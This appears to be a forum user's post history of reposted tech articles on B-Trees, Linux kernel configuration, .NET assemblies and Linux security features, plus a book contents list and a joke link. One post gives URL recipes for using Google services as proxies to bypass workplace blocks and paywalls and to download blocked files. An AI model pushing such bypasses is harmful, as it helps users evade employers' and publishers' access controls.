Everything posted by Nytro
-
[h=1]Trees, B-Trees, B+Trees and H-Trees[/h][h=3]Jarret W. Buse[/h]

B-Trees are used to help search various data. Some file systems use a B+Tree to search directories, extent descriptors, file allocations and even to retrieve files. In the future, B+Trees may be used to search through more types of data within file systems.

First, let's look at a Tree, using letters to represent files (C, F, L, N, P and Z). A Tree is a tree structure (upside down, as most people say) consisting of one root node, child nodes and leaf nodes. Each node contains a key and a pointer. The key is the search item, such as a file name. The data pointer for the key points to the actual data.

So, looking at Figure 1, let's assume File L is entered first in the Tree.

FIGURE 1

The next file added is File C. File C is added under the root node and to the left, since its value is less than the root (C<L). Greater values go to the right, so if File Z is added, it goes to the right of the root as shown in Figure 2.

FIGURE 2

We have three files left to add, so let's add Files F, N and P as shown in Figure 3.

FIGURE 3

In this case, the Tree is not balanced; that is, there are more nodes to the right of the root than to the left. In some cases, this may be fine. If you access File L more than the others, the search will occur very quickly. Of course, with the number of files on some file systems exceeding 10,000, this Tree would be quite large.

From Figure 3, Node L is the root node. Node C is a child node (as are Nodes Z and N). Nodes F and P are leaf nodes; leaf nodes are the nodes on the end that have no child nodes. Node C is considered the parent of Node F. Node L (the root) is the parent of Nodes C and Z.

In an extreme case, the root could be File Z, followed by a child node of File P, then N, L, F and finally C as shown in Figure 4. This layout would produce a very unbalanced tree that would most likely cause lengthy searches.
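The insertion rule just described (smaller values go to the left of a node, larger values to the right) can be sketched in a few lines of Python. The Node class and the single-letter file names are illustrative, not from the article:

```python
# Minimal binary tree sketch: values smaller than a node go to its left
# child, larger values to its right, as in Figures 1-3.

class Node:
    def __init__(self, key):
        self.key = key
        self.left = None
        self.right = None

def insert(root, key):
    """Insert a key, walking left for smaller values and right for larger."""
    if root is None:
        return Node(key)
    if key < root.key:
        root.left = insert(root.left, key)
    else:
        root.right = insert(root.right, key)
    return root

# Build the tree from Figure 3: L entered first, then C, Z, F, N and P.
root = None
for name in ["L", "C", "Z", "F", "N", "P"]:
    root = insert(root, name)

print(root.key)        # L is the root
print(root.left.key)   # C sits left of the root
print(root.right.key)  # Z sits right of the root
```

Inserting the same letters in a different order (for example Z first) produces the unbalanced chain described for Figure 4, which is exactly why balanced structures like B-Trees are preferred.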
FIGURE 4

Now, a B-Tree uses more keys within a node; the number of pointers per node is referred to as the order. If a B-Tree node contains five pointers, it is a B-Tree of order 5. Let's look at an example of a B-Tree root as shown in Figure 5.

FIGURE 5

The dots represent the pointers while the numbers represent the key values (file names, etc.). Notice that for this node, each key has a partnered pointer: Key-1 and Pointer-1, Key-2 and Pointer-2, etc. If you look at Figure 5, you notice there is an extra pointer (Pointer-0).

The tree works in a similar way to a regular tree. If the search item we are looking for is less than Key-1, Pointer-0 is followed. If the search item is greater than or equal to Key-1 and less than Key-2, we follow Pointer-1. If the search item is greater than or equal to Key-2 and less than Key-3, we follow Pointer-2. For example, if we were searching for the number 1, we would follow Pointer-0. If we were searching for 12, we would follow Pointer-2. By following these pointers, we are led to another node to perform the same task, and so on, until we reach a leaf which contains the search value. The search value points to the file we are searching for, or the search item is not found and an error message is returned.

Take a look at Figure 6 for the following example.

FIGURE 6

Let's say we are searching for 5. We start at the root node and determine whether the search value is less than Key-1 (3). Since it is not, we check whether the search value is between Key-1 (3) and Key-2 (10), which it is, so we follow Pointer-1. At this node, we check if the search value is less than Key-1 (5); it is not. Our search value is equal to Key-1 (5), so we follow Pointer-1 and find two leaf nodes (5 and 6). The first value matches our search, so we use the value in the leaf node to get to the file for which we have been searching.

Now, let's say we are searching for File-18. We start at the root and follow Pointer-2, since our search value is greater than or equal to Key-2 (10).
At the next node, we have three key values to check: 10, 15 and 22. We know that 18 is greater than 10 and 15, so we can skip Pointer-0 and Pointer-1 and follow Pointer-2. At the leaf nodes, we find two leaves, 15 and 20. File-18 does not exist, and a message can alert the user that there is no such file.

NOTE: Be aware that these searches are typically extremely fast. You can see how a tree allows for faster searching than going through a whole sequential file.

Now to move on to the more difficult parts: insertion and deletion. For Figure 6, let's add File-12. The first thing done during an insertion or deletion is to search for the entry being inserted or deleted. This is done for specific reasons:

Insertion - the entry must not already exist
Deletion - the entry must already exist

If the entry to be inserted exists, or the entry to delete does not exist, a message is generated. In the case of an indexed file listing for a file system, if a file we are copying to the hard disk already exists, we get a query asking whether to overwrite the file (it was found in the B-Tree). If we want to delete a file that does not exist, we get an error that the file does not exist.

Now, to get to the details of inserting File-12: if you look at Figure 6, we follow Pointer-2 to the next node. File-12 is greater than Key-1 (10) and less than Key-2 (15), so we follow Pointer-1. Now we find two leaf nodes (10 and 14). File-12 should be inserted between the two, as shown in Figure 7. Since File-12 falls between Leaf-10 and Leaf-14, no entries need to be made in a node.

FIGURE 7

Now, let's look at the possibility of adding File-8. Looking at Figure 7, we can see that File-8 would be searched for from the root, down Pointer-1. File-8 does not fit in this node anywhere, so another key must be made: Key-3 (8), as shown in Figure 8.

FIGURE 8

Now we can try another. Let's add File-30.
Following Pointer-2 from the root, we get to a node that has one space left, and File-30 is added there as shown in Figure 9.

FIGURE 9

What happens if we want to add File-40? Well, if the B-Tree is of order 5, we can only have five pointers per node. By adding File-40, we would create a node with more than five pointers. To accomplish the insertion, we take the node that is full and remove half of the key and pointer pairs. These entries are then placed in a new node. All associated leaves are moved as well, as shown in Figure 10.

NOTE: Each node must contain at least two keys (the root is the exception).

FIGURE 10

The keys (22 and 30) are moved to a new node. The largest leaf value (20) is added to the previous node as Key-3, so we now have a new high end for that node. Key-2 becomes File-40 when inserting the new key. The first key (30) of the new node must be placed in the root with a pointer associated with it. As you can see, File-22 and File-27 are placed in leaf nodes with Pointer-0 pointing to them.

NOTE: When something changes, the effect can "ripple" up to the root node. This is especially true for large B-Trees, which may have fuller nodes.

Looking at Figure 10, if any of the entries 6, 9, 12, 14, 22 or 27 were deleted, they could be removed with no further action. A search would be performed, and once the entry was found, the leaf would be deleted. For example, deleting File-9 from the B-Tree would result in Figure 11.

FIGURE 11

Now, let's look at what happens if we remove File-5. File-5 can easily be removed, but it is also a key, so the key must be removed as well. The keys to its right (7 and 8) would be moved to the left. Any leaf node not being removed (6) would be moved to join the leaves (3) to the left, as shown in Figure 12.

FIGURE 12

If we removed File-30, the same would happen, but the key in the root would change to the new Key-1 for the node, as shown in Figure 13.
FIGURE 13

If we also removed File-40, the last node would be removed, as would Key-3 in the root node, as shown in Figure 14. The leaves 22 and 27 can be moved to the left node.

FIGURE 14

The difference between a B-Tree and a B+Tree is that a B+Tree stores data in the leaves only, while a B-Tree can store data in the nodes. B+Trees can also store duplicate keys to allow for redundant data, which B-Trees cannot do.

NOTE: Another type of tree is the H-Tree. The H-Tree is the same as a B+Tree except that the keys are not a file name, directory name or whatever is being searched; instead, the keys are hashes. A hash is made of the key before it is placed into the H-Tree.

Source: Trees, B-Trees, B+Trees and H-Trees | Linux.org
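The pointer-selection rule used in all the searches above (less than Key-1 follows Pointer-0; greater than or equal to Key-i and less than Key-(i+1) follows Pointer-i) can be sketched in a few lines of Python. The helper name is mine, not from the article:

```python
from bisect import bisect_right

def child_index(keys, search):
    """Return which pointer to follow from a B-Tree node with sorted keys.

    Pointer-0 is taken when search < Key-1; Pointer-i is taken when
    Key-i <= search < Key-(i+1), exactly as in the walkthrough above.
    bisect_right counts the keys that are <= search, which is the same rule.
    """
    return bisect_right(keys, search)

# The search for 5 in Figure 6: root keys are 3 and 10.
print(child_index([3, 10], 5))        # 1: follow Pointer-1
# The search for File-18: follow Pointer-2 at the root...
print(child_index([3, 10], 18))       # 2
# ...then skip Pointer-0 and Pointer-1 at the node with keys 10, 15, 22.
print(child_index([10, 15, 22], 18))  # 2
```

Repeating this one-line decision at each level is what makes B-Tree lookups so fast: each node visited rules out all but one subtree.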
-
[h=1]The Linux Kernel: Configuring the Kernel (Part 1)[/h][h=3]DevynCJohnson[/h]

Now that we understand the Linux kernel, we can move on to the main event - configuring and compiling the code. Configuring code for the kernel does take a lot of time. The configuration tool asks many questions and allows developers to configure every aspect of the kernel. If unsure about any question or feature, it is best to pick the default value provided by the configuration tool. This tutorial series will walk readers through the whole process of configuring the kernel.

To configure the code, open a terminal in the main source code folder. Once a terminal is up, there are a few ways to configure the code, based on the preferred configuration interface:

make config - Plain text interface (most commonly used choice)
make menuconfig - Text-based with colored menus and radiolists. This option allows developers to save their progress. ncurses (ncurses-devel) must be installed.
make nconfig - Text-based colored menus. curses (libcdk5-dev) must be installed.
make xconfig - QT/X-windows interface. QT is required.
make gconfig - GTK/X-windows interface. GTK is required.
make oldconfig - Plain text interface that defaults questions based on the local config file.
make silentoldconfig - The same as oldconfig, except the questions already answered by the config file are not shown.
make olddefconfig - Like silentoldconfig, except some questions are answered by their defaults.
make defconfig - Creates a config file that uses default settings based on the current system's architecture.
make ${PLATFORM}_defconfig - Creates a config file using values from arch/$ARCH/configs/${PLATFORM}_defconfig.
make allyesconfig - Creates a config file that answers yes to as many questions as possible.
make allmodconfig - Creates a config file that makes as many parts of the kernel a module as possible.

NOTE: Code in the Linux kernel can be built into the kernel itself or made into a module. For instance, users can add Bluetooth drivers as a module (separate from the kernel), add them to the kernel itself, or not add them at all. When code is added to the kernel itself, the kernel requires more RAM and boot-up may take longer; however, the kernel will perform better. If code is added as modules, the code remains on the hard drive until it is needed, and only then is the module loaded into RAM. This reduces the kernel's RAM usage and decreases boot time. However, the kernel's performance may suffer because the kernel and the modules will be spread throughout the RAM. The other choice is to not add some code at all. For illustration, a kernel developer may know that a system will never use Bluetooth devices; as a result, the drivers are not added to the kernel, which improves the kernel's performance. However, if users later need Bluetooth devices, they will need to install Bluetooth modules or update the whole kernel.

make allnoconfig - Creates a config file that adds only essential code to the kernel; this answers no to as many questions as possible.
make randconfig - Makes random choices for the kernel.
make localmodconfig - Creates a config file based on the current list of loaded modules and system configuration.
make localyesconfig - Sets all module options to yes, so most of that code is built directly into the kernel rather than as modules.

TIP: It is best to use "make menuconfig" because users can save their progress; "make config" does not offer this luxury, and the configuration process takes a lot of time.

Configuration: Most developers choose "make menuconfig" or one of the other graphical menus. After typing the desired command, the first question asks whether the kernel to be built is going to be a 64-bit kernel or not.
The choices are "Y", "n", and "?". The question mark explains the question, "n" answers no, and "Y" answers yes. For this tutorial, I will choose yes. To do this, I type "Y" (this is case-insensitive) and hit enter.

NOTE: If the kernel is compiled on a 32-bit system, the configuration tool will instead ask if the kernel should be 32-bit. The first question is different on other processors.

The next line shows "Cross-compiler tool prefix (CROSS_COMPILE) []". If you are not cross-compiling, hit enter. If you are cross-compiling, type something like "arm-unknown-linux-gnu-" for ARM systems or "x86_64-pc-linux-gnu-" for 64-bit PC systems. There are many other possible prefixes for other processor types, but the list can be quite large. Once developers know what processor they want to support, it is easy to research the prefix needed for that processor.

NOTE: Cross-compiling is compiling code to be used on other processors. For illustration, an Intel system that is cross-compiling is making applications for processors other than Intel, so it may be compiling code for ARM or AMD processors.

NOTE: Each choice will change which questions come up and when they are displayed. I will include my choices so readers can follow the configuration process on their own systems.

Next, users will see "Local version - append to kernel release (LOCALVERSION) []". This is where developers can give a special version number or name to their customized kernel. I will type "LinuxDotOrg". The kernel version is now "3.9.4-LinuxDotOrg".

Next, the configuration tool asks "Automatically append version information to the version string (LOCALVERSION_AUTO) [N/y/?]". If a git tree is found, the revision number will be appended to the version string. This example is not using git, so I will answer no.

Remember vmlinuz and similar files? Well, the next question asks which compression format should be used.
The developer can choose one of five options:

1. Gzip (KERNEL_GZIP)
2. Bzip2 (KERNEL_BZIP2)
3. LZMA (KERNEL_LZMA)
4. XZ (KERNEL_XZ)
5. LZO (KERNEL_LZO)

Gzip is the default, so I will press "1" and hit enter. Each compression format offers a different compression ratio. A better compression ratio means a smaller file, but more time is needed to uncompress it; the opposite applies to lower compression ratios.

Now this line is displayed: "Default hostname (DEFAULT_HOSTNAME) [(none)]". The default hostname can be configured here. Usually, developers leave this blank (I left it blank) so that Linux users can set up their own hostname.

Next, developers can enable or disable support for swap space. Linux uses a separate partition called "swap space" as virtual memory; this is equivalent to Windows' paging file. Typically, developers answer yes to the line "Support for paging of anonymous memory (swap) (SWAP) [Y/n/?]".

The next line (System V IPC (SYSVIPC) [Y/n/?]) asks if the kernel should support IPC. Inter-Process Communication allows processes to communicate and synchronize. It is best to enable IPC; otherwise, many applications will not work. Answering yes to this question causes the configuration tool to ask "POSIX Message Queues (POSIX_MQUEUE) [Y/n/?]"; this question will only be seen if IPC is enabled. A POSIX message queue is a form of interprocess communication in which each message is given a priority. The default choice is yes; hit enter to choose the default (indicated by the capitalized choice).

The next question (open by fhandle syscalls (FHANDLE) [Y/n/?]) asks whether programs will be permitted to use file handles instead of filenames when performing filesystem operations, if needed. By default, the answer is yes.

Sometimes, when a developer has made certain choices, some questions will automatically be answered.
For instance, the next question (Auditing support (AUDIT) [Y/?]) is answered yes without prompting because previous choices require this feature. Auditing support logs the accesses and modifications of all files. The next question relates to auditing (Enable system-call auditing support (AUDITSYSCALL) [Y/n/?]); if enabled, all system calls are logged. If the developer wants performance, then as many auditing features as possible should be disabled and not added to the kernel. Some developers may enable auditing for security monitoring. I will select "no" for this question.

The next audit question (Make audit loginuid immutable (AUDIT_LOGINUID_IMMUTABLE) [N/y/?]) asks whether processes can change their loginuid (login user ID). If enabled, processes in userspace will not be able to change their own loginuids. For better performance, we will disable this feature.

NOTE: When configuring via "make config", the questions answered automatically by the configuration tool are displayed, but the user has no way to change the answer. When configuring via "make menuconfig", the user likewise cannot change such an option no matter what button is pressed. Developers should not want to change options like that anyway, because a previous choice requires the question to be answered a certain way.

In the next article, we will configure the IRQ subsystem and all of the following choices.

Source: The Linux Kernel: Configuring the Kernel (Part 1) | Linux.org
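Every answer given above ends up as a CONFIG_ line in the kernel's .config file (disabled options appear as "# CONFIG_FOO is not set" comments). A small Python sketch parsing a hypothetical fragment shows how the choices are recorded; the sample content mirrors this tutorial's answers but is otherwise made up:

```python
# A hypothetical fragment of a kernel .config file, mirroring the answers
# chosen in this tutorial (64-bit, gzip, swap, IPC on, syscall auditing off).
sample = """\
CONFIG_64BIT=y
CONFIG_LOCALVERSION="-LinuxDotOrg"
CONFIG_KERNEL_GZIP=y
CONFIG_SWAP=y
CONFIG_SYSVIPC=y
# CONFIG_AUDITSYSCALL is not set
"""

def parse_config(text):
    """Map option names to 'y'/'n'/string values from .config-style text."""
    options = {}
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("# CONFIG_") and line.endswith(" is not set"):
            # Disabled options are stored as comments, not as FOO=n lines.
            options[line[2:-len(" is not set")]] = "n"
        elif line.startswith("CONFIG_") and "=" in line:
            key, _, value = line.partition("=")
            options[key] = value.strip('"')
    return options

opts = parse_config(sample)
print(opts["CONFIG_64BIT"])         # y
print(opts["CONFIG_AUDITSYSCALL"])  # n
```

This is why "make oldconfig" can reuse a previous configuration: every prompt is just a question about one of these keys.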
-
[h=1].NET Assembly Programming[/h]Ajay Yadav July 16, 2013

Abstract

In this series, we'll examine the core details of creating, deploying and configuring .NET assemblies and their advantages over the existing COM technology. This article goes deeper into the role and format of .NET assemblies and modules. You'll explore the assembly manifest, see how exactly the .NET runtime resolves the location of an assembly, and come to understand an assembly's CIL code. This article will also state the distinction between single-file and multi-file assemblies.

Problems with COM

Microsoft itself introduced the phrase "DLL Hell" to describe the traditional problem with existing COM DLLs. Often old DLLs are replaced by a new version, breaking applications because a newly installed application overwrites a DLL that is also used by another application. Such problems occur because installation programs do not properly check DLL versions; a new DLL should be backward compatible with the old version to preserve existing functionality. The side-by-side DLL installation feature is unavailable in the existing COM technology: various locations may reference functionality incorporated in a DLL, and that functionality breaks when the old version is replaced by a new one.

With side-by-side installation, you can install two different versions of a single assembly. This could in principle be attempted with COM DLLs, but a problem arises: COM DLLs are not self-describing. The configuration of a COM component is stored in the registry, not in the component DLL itself, so the configuration information is taken from the last-installed version rather than allowing two versions of a single DLL to coexist.

Understanding Assemblies

The .NET Framework overcomes the DLL Hell and versioning issues of the existing COM technology by introducing assemblies.
Assemblies are self-describing installation units consisting of one or more files. Virtually every file that is developed and executed under the .NET Common Language Runtime (CLR) is called an assembly. An assembly file contains metadata and can be an .EXE, a .DLL or a resource file. Now, let's discuss some of the comprehensive benefits provided by assemblies.

Assemblies can be deployed as private or shared. Private assemblies reside in the same solution directory. Shared assemblies, on the other hand, are libraries intended to be consumed by numerous applications on a single machine, because they are deployed to a central repository called the GAC.

.NET assemblies are assigned a special four-part version number so that multiple versions of an assembly can run concurrently. The version number is specified as "<major>.<minor>.<build>.<revision>".

An assembly must have access to every external assembly it references in order to function properly. Assemblies are self-describing: they document all external references in the manifest. The comprehensive details of an assembly, such as member functions, variable names, base classes, interfaces and constructors, are placed in the metadata, so the CLR does not need to consult the Windows system registry to resolve their location.

The .NET Framework lets you reuse types in a language-independent manner without caring how a code library is packaged. Application isolation is ensured using application domains: a number of applications can run independently inside a single process, each within its own application domain. Installation of an assembly can be as simple as copying all of its files. Unlike COM, there is no need to register them in the Windows system registry.

Modules

Before delving into assembly types in detail, let's discuss modules. An assembly is typically composed of multiple modules. A module is a DLL without assembly attributes.
To get a better understanding, we create a C# class library project as follows:

public class test
{
    public test() { }

    public test(string fname, string lname)
    {
        this.FName = fname;
        this.LName = lname;
    }

    public string FName { get; set; }
    public string LName { get; set; }

    public override string ToString()
    {
        return FName + " " + LName;
    }
}

A module can be created by csc.exe with the /target:module switch. The following command creates a module, test.netmodule:

csc /target:module test.cs

A module also has a manifest, but there isn't an .assembly entry inside the manifest because a module doesn't have an assembly attribute. We can view a module manifest using the ildasm utility.

The main objective behind modules is that they can be used for faster startup of assemblies, because not all types are inside a single file; modules are loaded only when needed. Secondly, if you want to create an assembly using more than one programming language, one module could be written in VB.NET and another in F#. Finally, these modules can be combined into a single assembly.

Single-File and Multi-File Assemblies

Technically speaking, an assembly can be formed from a single file or multiple files. A single-file assembly contains all the necessary elements, such as CIL code, headers and the manifest, in a single *.exe or *.dll package. A multi-file assembly, on the other hand, is a set of .NET modules that are deployed and versioned as a single unit. Formally speaking, these modules are termed primary and secondary modules: the primary module contains the assembly-level manifest, while secondary modules, which have the *.netmodule extension, contain module-level manifests. The major benefit of multi-file assemblies is that they provide a very efficient way to download content.

Assembly Structure

An assembly is comprised of assembly metadata describing the complete assembly, type metadata describing the exported types and methods, MSIL code and resources.
All these fragments can be inside one file or spread across several files. Structurally speaking, an assembly is composed of the following elements:

CIL Code

The CIL code is a CPU- and platform-agnostic intermediate language. It can be considered the core backbone of an assembly. Given this design, .NET assemblies can indeed execute on a variety of devices, architectures and operating systems. At runtime, the internal CIL is compiled by the Just-in-Time (JIT) compiler into platform- and CPU-specific instructions. Understanding the grammar of CIL code can be helpful when building complex applications, but fortunately most .NET developers don't need to be deeply concerned with its details.

Windows File Header

The Windows file header determines how the Windows family of operating systems loads and manipulates an assembly. The header also identifies the kind of application (*.dll, console or GUI application) to be hosted by Windows. You can view the assembly header information using the dumpbin.exe utility as follows:

dumpbin /headers *.dll or *.exe

CLR File Header

The CLR header is a block of data that all .NET assemblies must support in order to be hosted by the CLR. It consists of numerous flags that enable the runtime to understand the layout of the managed code. We can view these flags using dumpbin.exe with the /clrheader flag.

Metadata

The .NET runtime uses metadata to resolve the location of types within the binary. An assembly's metadata comprehensively describes the format of the contained types, as well as the format of external type references. If you press the Ctrl+M keystroke combination, ildasm.exe displays the metadata for each type within the DLL file assembly.

Manifest

The assembly manifest documents each module within the assembly, establishes the version and acknowledges the externally referenced assemblies and their dependencies.
The assembly manifest is a significant part of an assembly and is composed of the following parts:

Identity - Includes version, name, culture and public key details.
Set of Permissions - Displays the permissions necessary to run the assembly.
List of Files - Lists all files belonging to a single-file or multi-file assembly.
External Referenced Assemblies - Documents the external reference files needed to run the assembly.

We can explore the assembly manifest using the ildasm.exe utility. Now, open the CSharpTest.dll manifest by double-clicking the MANIFEST icon. The first code block specifies all external assemblies, such as mscorlib.dll, required by the current assembly to function correctly. Here, each .assembly extern block is qualified by the .publickeytoken and .ver directives.

Typically, these settings can be configured manually in the solution's AssemblyInfo.cs file:

using System.Reflection;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;

[assembly: AssemblyTitle("CsharpTest")]
[assembly: AssemblyDescription("")]
[assembly: AssemblyConfiguration("")]
[assembly: AssemblyCompany("")]
[assembly: AssemblyProduct("CsharpTest")]
[assembly: AssemblyCopyright("Copyright © 2013")]
[assembly: AssemblyTrademark("")]
[assembly: AssemblyCulture("")]
[assembly: ComVisible(false)]

// The following GUID is the ID of the typelib if this project is exposed to COM
[assembly: Guid("2fcf6717-f595-4216-bb93-f6590e37b3e5")]

[assembly: AssemblyVersion("1.0.0.0")]
[assembly: AssemblyFileVersion("1.0.0.0")]

Resources

Finally, a .NET assembly may contain a number of embedded resources, such as picture files, application icons, sound files and culture information (satellite assemblies used to build international software).

Summary

This article drilled down into the details of how the CLR resolves the location of externally referenced assemblies.
We began by exploring the disadvantages of the existing COM technology, then examined the content within an assembly, such as CIL code, headers, metadata, the manifest and resources. We have also come to understand the distinction between single-file and multi-file assemblies. This article also covered the benefits of modules and assemblies in depth. Later, we will explore more advanced topics related to assemblies.

Source: .NET Assembly Programming
-
Hit the books, or: Timesnewroman.ro - An independent daily of voluntary humor - "Admissions have begun: 6 applicants per place at McDonald's, 13 per place at Dristor Kebab"
-
The Hacker Crackdown
Law and Disorder on the Electronic Frontier
Bruce Sterling (bruces@well.sf.ca.us)
Translated to HTML by Bryan O'Sullivan (bos@scrg.cs.tcd.ie).

Contents

Preface to the Electronic Release of The Hacker Crackdown
Chronology of the Hacker Crackdown
Introduction

Part 1: Crashing the System
A Brief History of Telephony / Bell's Golden Vaporware / Universal Service / Wild Boys and Wire Women / The Electronic Communities / The Ungentle Giant / The Breakup / In Defense of the System / The Crash Post-Mortem / Landslides in Cyberspace

Part 2: The Digital Underground
Steal This Phone / Phreaking and Hacking / The View From Under the Floorboards / Boards: Core of the Underground / Phile Phun / The Rake's Progress / Strongholds of the Elite / Sting Boards / Hot Potatoes / War on the Legion / Terminus / Phile 9-1-1 / War Games / Real Cyberpunk

Part 3: Law and Order
Crooked Boards / The World's Biggest Hacker Bust / Teach Them a Lesson / The U.S. Secret Service / The Secret Service Battles the Boodlers / A Walk Downtown / FCIC: The Cutting-Edge Mess / Cyberspace Rangers / FLETC: Training the Hacker-Trackers

Part 4: The Civil Libertarians
NuPrometheus + FBI = Grateful Dead / Whole Earth + Computer Revolution = WELL / Phiber Runs Underground and Acid Spikes the Well / The Trial of Knight Lightning / Shadowhawk Plummets to Earth / Kyrie in the Confessional / $79,499 / A Scholar Investigates / Computers, Freedom, and Privacy

Electronic Afterword to The Hacker Crackdown

Source: The Hacker Crackdown
Info: The Hacker Crackdown - Wikipedia, the free encyclopedia
-
Use Google as a Proxy Server to Bypass Paywalls, Download Files

If you have trouble accessing a web page, either because the website is blocked at your workplace or because the page happens to be behind a paywall, there are a couple of undocumented Google proxy servers that may help you read it. When you access a page via one of these Google proxies, the content of that page is downloaded to Google's servers and then served to you. The lesser-known gmodules.com proxy, discussed later, will even let you download documents, videos and other web files that are otherwise blocked.

1. Google Translate as a Proxy

To use Google Translate as a proxy, set the destination language to the actual language of the page and the source language to anything but the destination language. For instance, to access a page written in English, set the destination language (tl) in the translate URL to "en" and the source language (sl) to "ja" for Japanese:

http://translate.google.com/translate?sl=ja&tl=en&u=http://example.com/

Advantage: This is the most popular Google proxy, and the downloaded web page looks exactly like the original, provided the domains serving the images and CSS aren't blocked at your location.

2. Google Mobilizer as a Proxy

Next on the list is Google's Mobilizer service. Google has discontinued the main mobilizer service on google.com (secure), but you can still access it through any country-specific Google domain like google.co.in or google.ie. The URL would be:

http://www.google.ie/gwt/x?u=http://example.com/

Advantage: The presentation (CSS) isn't retained, but this mode is perfect for reading text-heavy pages, and you have the option of disabling inline images for faster loading.

3. Google Modules as a Proxy

The gmodules.com domain is part of the Google personalized homepage service and is primarily used for hosting gadgets that are available for the Google homepage.
http://www.gmodules.com/ig/proxy?url=http://example.com/

Advantage: This is the only Google proxy that will let you download files (like PDFs, .MP4 videos, etc.) in addition to viewing regular web pages.

Finally, if none of the above proxies work, you can always check the Google Cache or create your own proxy server using either this Google Script or the more advanced Google App Engine.

Source: How to Use Google as a Proxy Server
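The proxy URLs above are just the target address packed into a query string, so they are easy to build programmatically. A small Python sketch (helper names are mine; the URL shapes come from the article):

```python
from urllib.parse import urlencode

def translate_proxy_url(target, source_lang="ja", dest_lang="en"):
    """Build a Google Translate proxy URL.

    The destination language (tl) should match the page's real language so
    the text passes through unchanged; the source language (sl) just has to
    be different from it.
    """
    params = urlencode({"sl": source_lang, "tl": dest_lang, "u": target})
    return "http://translate.google.com/translate?" + params

def gmodules_proxy_url(target):
    """Build the gmodules.com proxy URL (the one that also serves raw files)."""
    return "http://www.gmodules.com/ig/proxy?" + urlencode({"url": target})

print(translate_proxy_url("http://example.com/"))
print(gmodules_proxy_url("http://example.com/report.pdf"))
```

Note that urlencode percent-escapes the target URL, which is the safe form of the hand-written examples above.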
-
Overview of Linux Kernel Security Features

Thursday, 11 July 2013 10:00 administrator

Editor's Note: This is a guest post from James Morris, the Linux kernel security subsystem maintainer and manager of the mainline Linux kernel development team at Oracle.

In this article, we'll take a high-level look at the security features of the Linux kernel. We'll start with a brief overview of traditional Unix security and the rationale for extending it for Linux, then we'll discuss the Linux security extensions.

Unix Security – Discretionary Access Control

Linux was initially developed as a clone of the Unix operating system in the early 1990s. As such, it inherits the core Unix security model—a form of Discretionary Access Control (DAC). The security features of the Linux kernel have evolved significantly to meet modern requirements, although Unix DAC remains the core model.

Briefly, Unix DAC allows the owner of an object (such as a file) to set the security policy for that object—which is why it's called a discretionary scheme. As a user, you can, for example, create a new file in your home directory and decide who else may read or write it. This policy is implemented as permission bits attached to the file's inode, which may be set by the owner of the file. Permissions for accessing the file, such as read and write, may be set separately for the owner, a specific group, and other (i.e. everyone else). This is a relatively simple form of access control list (ACL).

Programs launched by a user run with all of the rights of that user, whether they need them or not. There is also a superuser—an all-powerful entity which bypasses Unix DAC policy for the purpose of managing the system. Running a program as the superuser provides that program with all rights on the system.

Extending Unix Security

Unix DAC is a relatively simple security scheme, although, designed in 1969, it does not meet all of the needs of security in the Internet age.
It does not adequately protect against buggy or misconfigured software, for example, which may be exploited by an attacker seeking unauthorized access to resources. Privileged applications, those running as the superuser (by design or otherwise), are particularly risky in this respect. Once compromised, they can provide full system access to an attacker.

Functional requirements for security have also evolved over time. For example, many users require finer-grained policy than Unix DAC provides, and need to control access to resources not covered by Unix DAC, such as network packet flows.

It's worth noting that a critical design constraint for integrating new security features into the Linux kernel is that existing applications must not be broken. This is a general constraint imposed by Linus for all new features. The option of designing a totally new security system from the ground up is not available—new features have to be retrofitted and remain compatible with the existing design of the system. In practical terms, this has meant that we end up with a collection of security enhancements rather than a monolithic security architecture.

We'll now take a look at the major Linux security extensions.

Extended DAC

Several of the first extensions to the Linux security model were enhancements to existing Unix DAC features. The proprietary Unix systems of the time had typically evolved their own security enhancements, often very similar to each other, and there were some (failed) efforts to standardize these.

POSIX ACLs

POSIX Access Control Lists for Linux are based on a draft POSIX standard. They extend the abbreviated Unix DAC ACLs to a much finer-grained scheme, allowing separate permissions for individual users and different groups. They're managed with the setfacl and getfacl commands. The ACLs are stored on disk via extended attributes, an extensible mechanism for storing metadata with files.

POSIX Capabilities

POSIX Capabilities are similarly based on a draft standard.
The aim of this feature is to break up the power of the superuser, so that an application requiring some privilege does not get all privileges. The application runs with one or more coarse-grained privileges, such as CAP_NET_ADMIN for managing network facilities. Capabilities for programs may be managed with the setcap and getcap utilities. It's possible to reduce the number of setuid applications on the system by assigning specific capabilities to them; however, some capabilities are very coarse-grained and effectively provide a great deal of privilege.

Namespaces

Namespaces in Linux derive from the Plan 9 operating system (the successor research project to Unix). They are a lightweight form of partitioning resources as seen by processes, so that processes may, for example, have their own view of filesystem mounts or even the process table.

This is not primarily a security feature, but it is useful for implementing security. One example is where each process can be launched with its own, private /tmp directory, invisible to other processes, which works seamlessly with existing application code and eliminates an entire class of security threats.

The potential security applications are diverse. Linux namespaces have been used to help implement multi-level security, where files are labeled with security classifications, and potentially hidden entirely from users without an appropriate security clearance. On many systems, namespaces are configured via Pluggable Authentication Modules (PAM); see the pam_namespace(8) man page.

Network Security

Linux has a very comprehensive and capable networking stack, supporting many protocols and features. Linux can be used both as an endpoint node on a network and as a router, passing traffic between interfaces according to networking policies.

Netfilter is an IP network layer framework which hooks packets which pass into, through and from the system.
Kernel-level modules may hook into this framework to examine packets and make security decisions about them. iptables is one such module, which implements an IPv4 firewalling scheme, managed via the userland iptables tool. Access control rules for IPv4 packets are installed into the kernel, and each packet must pass these rules to proceed through the networking stack. Also implemented in this codebase are stateful packet inspection and Network Address Translation (NAT). Firewalling is similarly implemented for IPv6.

ebtables provides filtering at the link layer, and is used to implement access control for Linux bridges, while arptables provides filtering of ARP packets.

The networking stack also includes an implementation of IPsec, which provides confidentiality, authenticity, and integrity protection of IP networking. It can be used to implement VPNs, and also point-to-point security.

Cryptography

A cryptographic API is provided for use by kernel subsystems. It provides support for a wide range of cryptographic algorithms and operating modes, including commonly deployed ciphers and hash functions, and limited support for asymmetric cryptography. There are synchronous and asynchronous interfaces, the latter being useful for supporting cryptographic hardware, which offloads processing from general CPUs. Support for hardware-based cryptographic features is growing, and several algorithms have optimized assembler implementations on common architectures.

A key management subsystem is provided for managing cryptographic keys within the kernel. Kernel users of the cryptographic API include the IPsec code, disk encryption schemes including eCryptfs and dm-crypt, and kernel module signature verification.

Linux Security Modules

The Linux Security Modules (LSM) API implements hooks at all security-critical points within the kernel. A user of the framework (an "LSM") can register with the API and receive callbacks from these hooks.
